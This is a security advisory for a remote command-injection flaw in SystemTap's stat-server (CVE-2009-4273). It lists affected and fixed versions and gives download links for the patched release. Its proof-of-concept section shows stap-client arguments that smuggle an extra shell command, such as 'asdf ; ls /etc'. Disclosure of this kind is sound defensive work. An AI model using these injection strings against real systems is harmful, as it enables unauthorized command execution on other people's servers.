SystemTap 'stat-server' Remote Arbitrary Command Injection Vulnerability
BID:37842
Info
SystemTap 'stat-server' Remote Arbitrary Command Injection Vulnerability
| Bugtraq ID: | 37842 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4273 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 15 2010 12:00AM |
| Updated: | Apr 13 2015 09:51PM |
| Credit: | Frank Ch. Eigler |
| Vulnerable: |
SystemTap SystemTap 0.0.20090314 SystemTap SystemTap 0.0.20080705 SystemTap SystemTap 1.0 S.u.S.E. openSUSE 11.2 Redhat Enterprise Linux Desktop 5 client Redhat Enterprise Linux 5 Server Pardus Linux 2009 0 |
| Not Vulnerable: |
SystemTap SystemTap 1.1 |
Exploit / POC
SystemTap 'stat-server' Remote Arbitrary Command Injection Vulnerability
An attacker can exploit the issue using readily available tools.
The following example commands are available:
stap-client \; ...
stap-client -; ...
stap-client -D 'asdf ; ls /etc' ...
stap-client -e 'script' -D 'asdf ; \; '
An attacker can exploit the issue using readily available tools.
The following example commands are available:
stap-client \; ...
stap-client -; ...
stap-client -D 'asdf ; ls /etc' ...
stap-client -e 'script' -D 'asdf ; \; '
Solution / Fix
SystemTap 'stat-server' Remote Arbitrary Command Injection Vulnerability
Solution:
Updates are available. Please see the references for more information.
SystemTap SystemTap 1.0
SystemTap SystemTap 0.0.20080705
SystemTap SystemTap 0.0.20090314
Solution:
Updates are available. Please see the references for more information.
SystemTap SystemTap 1.0
-
SystemTap systemtap-1.1.tar.gz
http://sourceware.org/systemtap/ftp/releases/systemtap-1.1.tar.gz
SystemTap SystemTap 0.0.20080705
-
SystemTap systemtap-1.1.tar.gz
http://sourceware.org/systemtap/ftp/releases/systemtap-1.1.tar.gz
SystemTap SystemTap 0.0.20090314
-
SystemTap systemtap-1.1.tar.gz
http://sourceware.org/systemtap/ftp/releases/systemtap-1.1.tar.gz